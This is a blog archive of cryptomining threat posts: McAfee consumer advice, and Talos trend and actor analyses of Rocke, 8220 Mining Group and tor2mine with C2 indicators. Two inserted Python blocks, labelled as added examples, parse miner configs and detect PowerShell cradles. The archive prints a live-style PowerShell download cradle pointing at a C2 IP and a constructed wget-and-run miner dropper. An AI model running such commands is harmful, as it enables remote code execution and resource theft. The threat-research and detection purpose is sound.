Category Archives: cryptomining

Cryptojacking Up 4,000%: How You Can Block the Bad Guys

Think about it: In the course of your everyday activities — like grocery shopping or riding public transportation — the human body comes in contact with an infinite number of germs. In much the same way, as we go about our digital routines — like shopping, browsing, or watching videos — our devices can also pick up countless, undetectable pieces of malware or JavaScript that can infect our devices.

Which is why it’s possible that hackers may be using malware or script to siphon power from your computer — power they desperately need to fuel their cryptocurrency mining business.

What’s Cryptocurrency?

Whoa, let’s back up. What’s cryptocurrency and why would people rip off other people’s computer power to get it? Cryptocurrencies are virtual coins that have a real monetary value attached to them. Each crypto transaction is verified and added to the public ledger (also called a blockchain). The single public ledger can’t be changed without fulfilling certain conditions. These transactions are compiled by cryptocurrency miners who compete with one another by solving the complex mathematical equations attached to the exchange. Their reward for solving the equation is bitcoin, which in the crypto world can equal thousands of dollars.

Power Surge

Here’s the catch: To solve these complex equations and get to crypto gold, crypto miners need a lot more hardware power than the average user possesses. So, inserting malicious code into websites, apps, and ads — and hoping you click — allows malicious crypto miners to siphon power from other people’s computers without their consent.

While mining cryptocurrency can often be a harmless hobby, when malware or site code is attached to drain unsuspecting users’ CPU power, it’s considered cryptojacking, and it’s becoming more common.

Are you feeling a bit vulnerable? You aren’t alone. According to the most recent McAfee Labs Threats Report, cryptojacking has grown more than 4,000% in the past year.

Have you been hit?

One sign that you’ve been affected is that your computer or smartphone may slow down or have more glitches than normal. Crypto mining code runs quietly in the background while you go about your everyday work or browsing and it can go undetected for a long time.

How to prevent cryptojacking

Be proactive. Your first line of defense against a malware attack is to use a comprehensive security solution on your family computers and to keep that software updated.

Cryptojacking Blocker. This new McAfee product zeroes in on the cryptojacking threat and helps prevent websites from mining for cryptocurrency (see graphic below). Cryptojacking Blocker is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.

[Graphic: Cryptojacking Rising]

Discuss it with your family. Cryptojacking is a wild concept to explain or discuss at the dinner table, but kids need to fully understand the digital landscape and their responsibility in it. Discuss their role in helping to keep the family safe online and the motives of the bad guys who are always lurking in the background.

Smart clicks. One way illicit crypto miners get to your PC is through malicious links sent in legitimate-looking emails. Be aware of this scam (and many others) and think before you click on any links sent via email.

Stick with the legit. If a website, an app, or a pop-up looks suspicious, it could contain malware or JavaScript that instantly starts working (mining power) when you load a compromised web page. Stick with reputable sites and apps and be extra cautious with how you interact with pop-ups.

Install updates immediately. Be sure to keep all your system software up-to-date when alerted to do so. This will help close any security gaps that hackers can exploit.

Strong passwords. These little combinations are critical to your family’s digital safety and can’t be ignored. Create unique passwords for different accounts and be sure to change out those passwords periodically.

To stay on top of the latest consumer and security threats that could impact your family, be sure to listen to our podcast Hackable? And, like us on Facebook.

The post Cryptojacking Up 4,000%: How You Can Block the Bad Guys appeared first on McAfee Blogs.

As Cryptocurrency Crash Continues, Will Mining Threat Follow?

Post authored by Nick Biasini.

Executive Summary

As 2018 draws to a close, one technology has definitively left its mark on the year: cryptocurrencies. Digital currencies started the year out strong after a meteoric rise toward the end of 2017. Since then, it's safe to say that cryptocurrencies have had a massive impact globally, especially on the threat landscape. However, 2018 is ending on a sour note for these currencies, as they have been in steady decline, ending in a sudden drop resulting in losses in excess of 75 percent of their value from the highs of late 2017 and early 2018.

Malicious cryptocurrency mining became the new payload of choice for adversaries seeking recurring revenue, dislodging the lump-sum payouts of threats like ransomware from the top of the threat landscape.

But the sudden collapse of the market, after a gradual decline, raises the question about how the threat landscape would be impacted, if at all. Despite conventional wisdom, Cisco Talos hasn't seen a notable shift away from cryptocurrency mining. We have seen pockets of movement, but they have lived explicitly in the email space where both threat distribution and botnets play a crucial role. As 2018 proceeded, adversaries have shifted payloads in the email space away from cryptocurrency mining and toward more modular threats like Emotet and remote access trojans (RATs). Talos is also releasing another blog today outlining some of the campaigns we've seen recently from some well-known actors who have a history with cryptocurrency mining.

After reviewing the real-world impact and associated data, it appears that cryptocurrency mining is not slowing down, and if anything, could be slightly increasing in frequency for certain aspects of the landscape. As we move into 2019, it's likely that the payloads of choice will continue to diverge between different aspects of the threat landscape. Regardless, enterprises need to be prepared to deal with malicious or unauthorized cryptocurrency mining activities on their respective networks, because it's not going away — at least not yet.

Introduction

It's clear, as far as the threat landscape is concerned, 2018 was the year of malicious cryptocurrency mining. Cisco Talos first covered cryptocurrency mining in early 2018, and again at multiple points throughout the year, including a whitepaper discussing the threat and associated coverage. In these attacks, malicious actors inject malware into systems and steal their computing power to "mine" cryptocurrencies. If done on a large scale, this kind of attack could cost enterprises a great deal of energy and resources. And for a personal user, it could significantly slow down their computing power and speed.

At the time, it was clear that actors had started to push quickly into primarily Monero-based cryptocurrency mining as a payload of choice. Since then, we have witnessed one of the most significant shifts in the threat landscape in years — and perhaps ever. Adversaries have gone all in on the idea of the recurring revenue model of cryptocurrency mining instead of the lump-sum gamble that ransomware provided so effectively throughout 2016 and 2017. In ransomware attacks, attackers asked for infected users to pay them a sum of money in exchange for the return of their information. But with miners, the attackers see revenue on a daily basis from their activities.

This mass migration does have its risks, however. Primary among them is the value of the currency being mined. When we first wrote about malicious cryptocurrency mining, an adversary could hope to make about $0.25 per day for a basic home computer. As of the writing of this blog, that value has cratered to a little more than $0.04 per day for that same computer. As you can imagine, this has had an impact on adversaries' bottom lines. It now takes almost six systems to create the same revenue that one generated previously. Before we get too deep into the potential impact, let's discuss the size and scope of the role that cryptocurrency mining had on the threat landscape in 2018. One of the most interesting aspects is how widely this shift was adopted across multiple different attack avenues including spam, web and active exploitation.

Spam and the mining effect

One of the best indicators for how a threat is affecting the threat landscape is spam levels. Much of the spam we see on a daily basis is being generated from botnets, and those botnets are undertaking that activity to generate revenue. This is where we have seen some shifts throughout the year of cryptocurrency mining. As you can see below, the amount of overall spam, excluding two extremely high-volume campaigns early in 2018, is down.

Late in 2017 and continuing into early 2018, spam levels were dropping. Since then, they have begun to rise, and are now approaching the levels seen through most of 2017. This is indicative of botnet functionality shifts, where some of the systems that had previously been used to send spam may have been altered to instead work on cryptocurrency mining. There have been reports throughout the past year of botnets such as Necurs experimenting with cryptocurrency mining instead of spam generation. However, there are two sides to the spam landscape, and they tell two different stories. On one side are those that control the botnets that send spam; on the other are those who use spam as a mechanism to spread their malware.

Adversaries that deliver their malware via spam are a different demographic, and as such, the landscape appears slightly different. Early on in 2018, Talos saw near-constant campaigns delivering malicious cryptocurrency miners directly or using a downloader. As the year progressed, and more recently as the price of cryptocurrencies began to waver, we are seeing adversaries push into different areas, delivering different payloads.

Emotet became one of the big winners as cryptocurrency miners waned. We have seen Emotet continue to be delivered in large numbers when active. Emotet continues to be a highly effective, modular payload that contains several functions, now including ransomware. These types of modular malware frameworks that allow adversaries to deliver varied payloads are going to continue to rise in popularity, as the final payload can depend on a lot of external factors. Today, when looking at the spam landscape, you do periodically see campaigns delivering miners, but they are far less common than they were earlier in 2018. Now, you are more likely to find a RAT or a modular threat like Emotet than a miner. Cryptocurrency mining has had a marked impact on the email threat landscape in 2018, but email is just one of the key indicators on the threat landscape. Next, we'll take a look at web-based attacks.

Web

Web-based attacks continue to be heavily leveraged by attackers to compromise systems around the world. In previous years, exploit kits and malvertising campaigns were used to distribute ransomware and other threats to compromised systems. Since late 2016, there has been a marked decline in global exploit kit activity. Of the campaigns that remained, malicious cryptomining payloads were being distributed commonly via downloaders, rather than some of the other malware that had been historically associated with these campaigns. Along with exploit kits and malvertising, cryptocurrency mining malware was also frequently seen being delivered through fake Flash Player updates. In these attacks, victims are prompted to update their version of Adobe Flash Player, but the malware downloads a payload used to infect systems and mine cryptocurrency for cybercriminals.

Likewise, "in-browser" mining such as CoinHive became popular, with many websites using scripts embedded on web pages that cause visitors of the websites to mine cryptocurrency in their web browsers. Cryptocurrency mining became so mainstream in 2018 that some shareware applications were even prompting users to allow them to leverage their systems to mine cryptocurrency as a way to support the application's developers. Regardless of the methodology, there is too much of an opportunity for adversaries to pass up. Malicious cryptocurrency mining can involve almost no additional communications, and in the case of in-browser or shareware-supported mining, it's as simple as "some money is better than no money." As long as there is money to be made, malicious or unauthorized cryptocurrency mining will be part of daily life on the internet. We've covered web and email; now let's turn our focus to more active measures that adversaries take with direct, active exploitation.

Active exploitation

One unique aspect of malicious cryptocurrency mining is that the amount of revenue a compromised system can generate is directly related to the hardware that the system is running. Cisco Talos observed, for at least a year, as adversaries discussed the potential for malicious cryptocurrency mining and then implemented those capabilities. Talos has seen countless examples of how active exploitation can play a significant role in malicious cryptocurrency mining.

From Apache Struts to EternalBlue, Oracle WebLogic, and other widespread remotely exploitable bugs, adversaries have been actively exploiting systems to deliver hordes of miners. In some cases, adversaries added worming functionality — meaning the malware can self-replicate and affect other machines — to infect large swaths of machines as fast as possible. Regardless of the methodology, servers are a vital target for malicious cryptocurrency mining because of the increased revenue potential. This has mainly remained steady despite the volatility of the value in the currency itself. The fact remains that cryptocurrency mining generates revenue, and once an actor or group of actors has taken the time and cost to retool for a new threat, it's going to take a lot to move them off of that particular payload. If there were to be a significant global shift in cryptocurrency mining, this would be the place where it would likely be most noticeable. Each area of the threat landscape has been impacted in some way by cryptocurrency mining, but the real-life impacts are where enterprises are most concerned.

For more detail on the progression of these campaigns over the past year, with a specific focus on these active exploitation campaigns, see our accompanying blog here.

Real-life impact

One of the best indicators of where we are with a threat is the real-life impact. For this blog, there are two primary areas where that data will be: from the endpoint and the network. Without question, cryptocurrency mining has been the dominant threat on the threat landscape for much, if not all, of 2018. The most common alert we received in 2018 was related to cryptocurrency mining, its delivery, or its propagation by a significant margin. What's even more interesting is it doesn't appear to be fading, at least not yet.

When we began looking at the data, the expectation was that the overall amount of cryptocurrency mining activity would be decreasing in recent months, but that wasn't the case. There has been a small decrease in the amount of cryptocurrency mining activity, but that decrease has been confined to a couple of areas of the threat landscape. The most substantial decrease has been in the number of malicious spam emails. Earlier on in 2018, we would see campaigns running around the clock delivering cryptocurrency miners. By the end of 2018, that was not the case. Instead, it's threats like RATs and Emotet that are dominating that particular landscape.
As you can see, there has been some variance in the number of events from week to week over the past six months, but generally, the trend line has held, and the overall volume of alerts has not changed significantly since June 2018.

Let's start by looking at network-based detections. In this particular circumstance, we are looking specifically at cryptocurrency mining activity on the wire, and not the delivery or propagation of the miners. This is a clean look specifically at actual mining activity instead of the distribution. Notice that if you look at the trend line, levels have increased slightly dating back to June. So despite the fact that we do not see miners being pushed at the same level, specifically in the email space, the overall capabilities remain primarily static. This implies both long-term mining activity and the importance of active exploitation, brute forcing and web-based attacks to the threat landscape, specifically around malicious mining.
The endpoint data held steady for the most part but it does vary more widely from one day to the next. That could be the result of systems being shut down or cleaned at irregular intervals. Regardless, you do not see any significant downward movement, including the last month when the price of cryptocurrencies truly cratered.

Cryptocurrency price crash

The real driving factor behind this potential large-scale shift is the value of cryptocurrency across the board. It reached levels in late 2017 that were not thought possible a mere six months earlier. As that rise continued, extreme interest in cryptocurrencies rose along with it. Quickly, people that had invested thousands of dollars a few years prior were now knocking on the door of being millionaires. This also coincided with the rise of ransomware, since cryptocurrencies are the primary method of payment.

The benefits weren't restricted to those that adopted the new currency early on. Adversaries and businesses alike found themselves sitting on sizable chunks of digital currency. Bad actors that were accepting bitcoin early on saw its value increase by tenfold, if not more, but there were always murmurs and skepticism around the meteoric rise in value.

Over the past six months, the value of cryptocurrencies had begun to fade, and over the last month-plus, the values have plummeted. At this point, most of the currencies have lost at least 75 percent of their peak values and late investors and adversaries may be paying the price.
Late in 2017, Bitcoin set an all-time high of nearly $20,000, and since then, it's been a steady decline to a value of less than $4,000, a decline of more than 75 percent from its peak in December 2017.
Monero has followed a similar path, albeit on a smaller scale. Early in 2018, Monero prices hit an all-time high of just above $470 per coin and a steady decline has followed throughout 2018. The value has now cratered to below $55 a coin — an astonishing loss of 86 percent of its value in less than a year as of the time of writing.

Although it's been a steady decline throughout the past year, the last month has been particularly brutal. Both Bitcoin and Monero have been hemorrhaging value in the past 30 days, and the effects are stark. Bitcoin has lost an improbable 40 percent of its value in the last month, only to be topped by Monero, which lost a staggering 50 percent of its value in the past 30 days.

Despite its recent collapse, it's evident that cryptocurrency is here to stay and will remain a player on the threat landscape for quite some time. For adversaries using cryptocurrency for payments, such as ransomware, the collapse doesn't have much of an effect: they simply increase the amount of coin they request to account for the decreased value.

Future of mining

Now that all the data has been discussed, the real question remains: What does this mean for the future of mining?

The honest answer is we don't know, but there is plenty of room to speculate. The first thing to realize is cryptocurrency mining is a large portion of the threat landscape, and it will continue to be, but the question is where. The tooling and methodology required to make the shift for a threat group doing things like active exploitation and brute forcing are going to be exceedingly different from those looking to compromise average users using threats like cryptocurrency mining, RATs and banking trojans, among others. As such, the outlook for their respective landscapes differs significantly.

Those groups that focus on active exploitation and brute forcing are all in on mining, and it will take some additional force to move them off of this payload, mainly because of the resources they've already committed. It takes time and effort to shift away from things like distributed denial-of-service and spam botnets to cryptomining. Many of these adversaries took the time and effort to shift away and focus on mining. A decrease in the value of the currency isn't going to move them off of that.

Additionally, it's a question of risk and opportunity. Conducting a campaign of malicious cryptocurrency mining is far less likely to draw the attention of a security team or law enforcement when compared to some of the noisier threats like ransomware, which requires command and control, victim interaction and continued communications. Malicious mining, on the other hand, allows for somewhat stable revenue generation, despite a potentially limited earning potential per system. Money is money, and if you are operating at scale and stealing all the resources, it's primarily profit.

Conclusion

Malicious cryptocurrency mining is a massive part of the threat landscape in 2018 and appears poised to remain a significant player in 2019 and beyond. Despite the recent catastrophic price collapse of these currencies, it is still profitable in many circumstances. That does not mean that the collapse has had no impact — we've seen that it has had an impact on the volume of spam.

The data shows that this activity has been steady for the past six months, and although there is a potential for a significant shift in the next six months, at least so far, it isn't in the data. Time will be the true wildcard in how mining lives on. Given time, adversaries may find a more attractive target, but right now, there are not many options that generate reliable income, with minimal risk, and don't require remote access to compromised systems. This is probably the biggest reason why mining isn't going anywhere: It's profitable. And because it's easy, anyone looking to make money will be drawn to it.

The real question is: What's next? What are the threats that enterprises should be preparing for today? Modular, flexible malware is likely the path forward as the avenues for monetization continue to change and evolve. Adversaries that are driven by monetary gain stand to generate the most revenue if they profile the end system, much like downloaders can and do today. If you compromise a gaming system or a high-end server, a threat like a miner might be ideal. However, if you compromise a high-end laptop located in the U.S., you may decide ransomware is the best avenue, or if it's part of a corporate domain, just monetizing the access might be preferred. Or when compromising an average computer in a developing country, a simple bot might be best to provide a foothold to propagate an actor's malicious intentions or attack other systems and computers with an added layer of anonymity.

Regardless, it's clear why adversaries desire this type of flexibility. As systems get faster and the ways that a compromised system can be monetized continue to grow, modular malware will rise in popularity.

Connecting the dots between recently active cryptominers

Post authored by David Liebenberg and Andrew Williams.

Executive Summary

Through Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors that have netted them hundreds of thousands of U.S. dollars combined.

This blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies.

We will cover the recent activities of these actors:
  • Rocke — A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.
  • 8220 Mining Group — Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. The group targets Drupal, Hadoop YARN and Apache Struts2.
  • Tor2Mine — A group that uses tor2web to deliver proxy communications to a hidden service for command and control (C2).
These groups have used similar TTPs, including:
  • Malicious shell scripts masquerading as JPEG files with the name "logo*.jpg" that install cron jobs and download and execute miners.
  • The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.
  • Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.
  • Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.
  • Tools such as XHide Process Faker, which can hide or change the name of Linux processes, and PyInstaller, which can convert Python scripts into executables.
We were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in.

The recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the illicit cryptocurrency threat. However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. Talos published separate research today covering this trend.

Timeline of actors' campaigns

[Figure: Timeline of Activity]

Introduction

Illicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in delivering remote access trojans (RATs) and other malware.

Through our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing analysis of these attacks' wallets and command and control (C2) servers, we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining.

We also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in.

We first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs.

We began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. We also noticed a similar toolset being used by an actor we named "tor2mine," based on the fact that they additionally used tor2web services for C2 communications.

We also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits.

Rocke/Iron cybercrime group

Cisco Talos wrote earlier this year about Rocke, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure.

In the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted Jenkins and JBoss servers, continuing to rely on malicious Git repositories, as well as malicious Amazon Machine Images. They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware capabilities. Several campaigns used the XHide Process Faker tool.

We have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn.

The dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files.

While keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called whatMiner, developed by a Chinese-speaking actor. WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme for the project describes it as "collecting and integrating all different kinds of illicit mining malware."

[Figure: Git repository for whatMiner]

Looking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors onto the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one.

While looking through this repository, we found a folder called "sustes." There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet.
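The attribution above rests on wallets and pool addresses pulled out of the dropper script and the miner config, so the same wallet can be matched across samples. The script below does that extraction; it is an added example, not Talos tooling. It assumes XMRig's documented config keys ("pools", "url", "user", "pass") and command-line flags (-o/--url, -u/--user); the wallet and file contents are constructed placeholders.

```python
"""Extract pool URLs and Monero wallets from miner artefacts (a dropper shell
script and an XMRig-style JSON config) and pivot on shared wallets. Added
example; sample contents are constructed and FAKE_WALLET is not a real address."""
import json
import re
import shlex

# Monero base58 alphabet (no 0, O, I, l). Standard and subaddresses are 95 chars
# starting with 4 or 8; integrated addresses are 106 chars starting with 4.
MONERO_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
MONERO_RE = re.compile(r"^(4[%s]{94}|8[%s]{94}|4[%s]{105})$" % ((MONERO_B58,) * 3))


def normalize_wallet(user_field: str) -> str:
    """Drop worker-name / difficulty suffixes pools accept in the user field,
    e.g. 'WALLET.worker1' or 'WALLET+40000', leaving the bare address."""
    return re.split(r"[.+#]", user_field, maxsplit=1)[0]


def is_monero_address(s: str) -> bool:
    return bool(MONERO_RE.match(s))


def pools_from_config(text: str) -> list:
    """Parse an XMRig-style JSON config into [(pool_url, wallet), ...].
    Handles both the 'pools' array and the older flat url/user layout."""
    cfg = json.loads(text)
    entries = cfg["pools"] if isinstance(cfg.get("pools"), list) else [cfg]
    out = []
    for pool in entries:
        url, user = pool.get("url"), pool.get("user")
        if url and user:
            out.append((url, normalize_wallet(user)))
    return out


def pools_from_shell(script: str) -> list:
    """Find miner invocations in a dropper script and pull their -o/-u arguments."""
    out = []
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            argv = shlex.split(line)
        except ValueError:              # unbalanced quotes; skip the line
            continue
        url = user = None
        for i, tok in enumerate(argv):
            if tok in ("-o", "--url") and i + 1 < len(argv):
                url = argv[i + 1]
            elif tok.startswith("--url="):
                url = tok.split("=", 1)[1]
            elif tok in ("-u", "--user") and i + 1 < len(argv):
                user = argv[i + 1]
            elif tok.startswith("--user="):
                user = tok.split("=", 1)[1]
        if url and user:
            out.append((url, normalize_wallet(user)))
    return out


def wallets_by_artifact(artifacts: dict) -> dict:
    """Map each valid wallet to the artefact names that reference it. A wallet
    shared across artefacts or campaigns is the pivot used for attribution."""
    seen = {}
    for name, (kind, text) in artifacts.items():
        pairs = pools_from_config(text) if kind == "json" else pools_from_shell(text)
        for _url, wallet in pairs:
            if is_monero_address(wallet):
                seen.setdefault(wallet, set()).add(name)
    return {w: sorted(names) for w, names in seen.items()}


# --- constructed samples modelled on the mr.sh / xm64 / wt.conf trio above ---
FAKE_WALLET = "4" + "B" * 94            # placeholder shaped like a standard address
SAMPLE_CONF = (
    '{"algo": "cryptonight", "threads": 4, '
    '"pools": [{"url": "pool.example.invalid:3333", "user": "WALLET.worker1", "pass": "x"}]}'
).replace("WALLET", FAKE_WALLET)
SAMPLE_MR_SH = f"""#!/bin/bash
# constructed dropper: fetch the miner, then run it against a second pool
wget -q http://example.invalid/xm64 -O /tmp/xm64 && chmod +x /tmp/xm64
nohup /tmp/xm64 -o pool2.example.invalid:5555 -u {FAKE_WALLET}+40000 -p x >/dev/null 2>&1 &
"""
SAMPLE_ARTIFACTS = {"wt.conf": ("json", SAMPLE_CONF), "mr.sh": ("shell", SAMPLE_MR_SH)}


if __name__ == "__main__":
    for wallet, names in wallets_by_artifact(SAMPLE_ARTIFACTS).items():
        print(wallet[:12] + "...", "referenced by", names)   # ['mr.sh', 'wt.conf']
```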

Many of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. Both samples also made requests for a file called "TermsHost.exe" from an IP 39[.]108[.]177[.]252, as well as a file called "xmr.txt" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called "TermsHost.exe" hosted on their C2 ssvs[.]space and a Monero mining config file called "xmr.txt" on the C2 sydwzl[.]cn.

When we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed that they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services.

Note that Rocke activity tapered off towards the end of the year. Security researchers at the Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has been no activity on Rocke's GitHub since November, nor have we seen related samples in our honeypots since that time.

8220 Mining Group

As we previously described, Rocke originally forked a repository called "whatMiner." We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor — 8220 Mining Group — due to the repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke.

We first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a cURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed:

We were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 Mining Group is likely responsible for.

These campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited the Drupal content management system, Hadoop YARN, Redis, WebLogic and CouchDB. Besides leveraging malicious bash scripts, Git repositories and image-sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using malicious Docker images. 8220 Mining Group was able to amass nearly $200,000 worth of Monero through their campaigns.

There were some similarities between the TTPs used by Rocke and 8220 Mining Group in these campaigns. The actors downloaded a malicious file "logo*.jpg" (very similar to Rocke's use of malicious scripts under the file name "logo*.jpg"), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing.

tor2mine

Over the past few years, Talos has been monitoring access to tor2web services, which serve as a bridge between the internet and the Tor network, an overlay network that enables anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and they allow the C2 server's IP address to be hidden.

Recently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to.

It is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system:

C:\Windows\System32\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))
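
The command line above is a classic in-memory download cradle: hidden window, no profile, execution policy bypassed, and a remote script fed straight to iex. The following is an added example (not code from the report) of detection logic that parses process-creation log lines for those indicators together and surfaces the fetched URL. The log lines are constructed, with a TEST-NET address standing in for the C2 IP.

```python
"""Flag PowerShell download cradles in process command lines (added example;
SAMPLE_LOG is constructed, not telemetry from the report)."""
import re

# Indicator name and case-insensitive pattern. Short and long parameter
# spellings are both covered (-w 1 / -WindowStyle Hidden, -ep / -ExecutionPolicy).
INDICATORS = [
    ("hidden_window", r"-w(?:indowstyle)?\s+(?:1|hidden)\b"),
    ("no_profile",    r"-nop(?:rofile)?\b"),
    ("policy_bypass", r"-e(?:xecutionpolicy|p)?\s+bypass\b"),
    ("invoke_expr",   r"\b(?:iex|invoke-expression)\b"),
    ("web_download",  r"\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b"),
    ("remote_url",    r"https?://[^\s'\")]+"),
]

def analyze_command_line(cmdline):
    """Return (hits, url, is_cradle) for one process command line.
    A cradle is remote code fetched over HTTP and executed in memory."""
    hits = [name for name, pat in INDICATORS if re.search(pat, cmdline, re.IGNORECASE)]
    m = re.search(INDICATORS[-1][1], cmdline, re.IGNORECASE)
    url = m.group(0) if m else None
    is_cradle = "invoke_expr" in hits and "web_download" in hits and url is not None
    return hits, url, is_cradle

def scan_log(lines):
    """Pull the CommandLine field from Sysmon-style lines and alert on cradles."""
    alerts = []
    for line in lines:
        m = re.search(r"CommandLine=(.*)$", line)
        if not m:
            continue
        hits, url, is_cradle = analyze_command_line(m.group(1))
        if is_cradle:
            alerts.append({"cmd": m.group(1), "url": url, "indicators": hits})
    return alerts

# Constructed log lines: one benign scheduled script, one download-to-disk
# fetch without execution, and one cradle shaped like the command above.
SAMPLE_LOG = [
    r"EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CommandLine=powershell.exe -NoProfile -File C:\scripts\nightly-backup.ps1",
    r"EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CommandLine=powershell.exe -c Invoke-WebRequest http://198.51.100.7/a.txt -OutFile a.txt",
    r"EventID=1 Image=C:\Windows\System32\cmd.exe "
    r"CommandLine=C:\Windows\System32\cmd.exe /c powershell.exe -w 1 -NoProfile "
    r"-InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object "
    r"System.Net.WebClient).DownloadString('http://198.51.100.7/v1/check1.ps1'))",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print("CRADLE", alert["url"], ",".join(alert["indicators"]))
```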

We identified additional malware on this IP, which belongs to Total Server Solutions LLC. It appears to include 64-bit and 32-bit variants of XMRigCC (a variant of the XMRig miner), Windows executable versions of publicly available EternalBlue/EternalRomance exploit scripts, an open-source TCP port scanner, and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid writing executables to the disk.

